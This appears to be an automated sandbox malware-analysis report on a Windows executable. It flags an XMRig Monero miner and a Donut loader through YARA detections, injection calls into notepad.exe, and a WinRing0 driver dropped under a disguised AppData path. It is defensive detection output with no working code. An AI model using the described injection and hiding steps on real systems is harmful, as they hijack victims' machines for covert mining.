Source: unknown, Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49745

            System Summary

            barindex
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
            Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: C:\Users\user\Desktop\9d2h99wrj.exe | Code function: 0_2_00401D58 NtAllocateVirtualMemory,0_2_00401D58
            Source: C:\Users\user\Desktop\9d2h99wrj.exe | Code function: 0_2_00401D18 NtWriteVirtualMemory,0_2_00401D18
            Source: C:\Users\user\Desktop\9d2h99wrj.exe | Code function: 0_2_004019D8 NtCreateThreadEx,0_2_004019D8
            Source: C:\Users\user\Desktop\9d2h99wrj.exe | Code function: 0_2_00401D98 NtProtectVirtualMemory,0_2_00401D98
            Source: C:\Users\user\Desktop\9d2h99wrj.exe | Code function: 0_2_00401C98 NtClose,0_2_00401C98
            Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
            Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: WR64.sys.1.drBinary string: \Device\WinRing0_1_2_0
            Source: classification engineClassification label: mal100.evad.mine.winEXE@12/11@2/2
            Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\LibsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlnwzksp.mzc.ps1Jump to behavior
            Source: 9d2h99wrj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='notepad.exe'
            Source: C:\Users\user\Desktop\9d2h99wrj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 9d2h99wrj.exeVirustotal: Detection: 59%
            Source: 9d2h99wrj.exeReversingLabs: Detection: 60%
            Source: notepad.exeString found in binary or memory: id-cmc-addExtensions
            Source: notepad.exeString found in binary or memory: set-addPolicy
            Source: unknownProcess created: C:\Users\user\Desktop\9d2h99wrj.exe "C:\Users\user\Desktop\9d2h99wrj.exe"
            Source: C:\Users\user\Desktop\9d2h99wrj.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"
